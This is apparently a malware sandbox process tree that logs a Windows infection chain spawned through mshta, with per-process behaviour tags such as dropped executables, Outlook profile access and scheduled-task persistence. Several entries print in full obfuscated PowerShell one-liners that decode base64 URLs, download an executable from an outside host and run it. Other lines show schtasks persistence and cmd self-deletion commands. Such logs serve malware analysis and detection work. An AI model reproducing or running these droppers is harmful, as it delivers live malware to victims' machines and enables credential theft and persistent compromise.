C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:1576
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Users\Public\qdt.exe"C:\Users\Public\qdt.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"6⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"8⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exeC:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4596 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4596 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\039961947608230\\* & exit11⤵PID:4660
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 459612⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exeC:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\cc.exe"C:\Users\Admin\AppData\Local\Temp\cc.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:4184 -
C:\Users\Admin\AppData\Local\Temp\cc.exeC:\Users\Admin\AppData\Local\Temp\cc.exe10⤵
- Executes dropped EXE
PID:1556 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"11⤵
- Creates scheduled task(s)
PID:4272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pm.exe"C:\Users\Admin\AppData\Local\Temp\pm.exe"9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exeC:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"9⤵PID:4488
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 310⤵
- Delays execution with timeout.exe
PID:4564
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qdt.exeC:\Users\Admin\AppData\Local\Temp\qdt.exe6⤵
- Executes dropped EXE
PID:4848 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 9127⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Public\sko.exe"C:\Users\Public\sko.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"6⤵PID:4704
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"8⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exeC:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe10⤵
- Executes dropped EXE
PID:4616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 120811⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exeC:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exeC:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe8⤵
- Executes dropped EXE
PID:4296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sko.exeC:\Users\Admin\AppData\Local\Temp\sko.exe6⤵
- Executes dropped EXE
PID:4884
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:596
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
-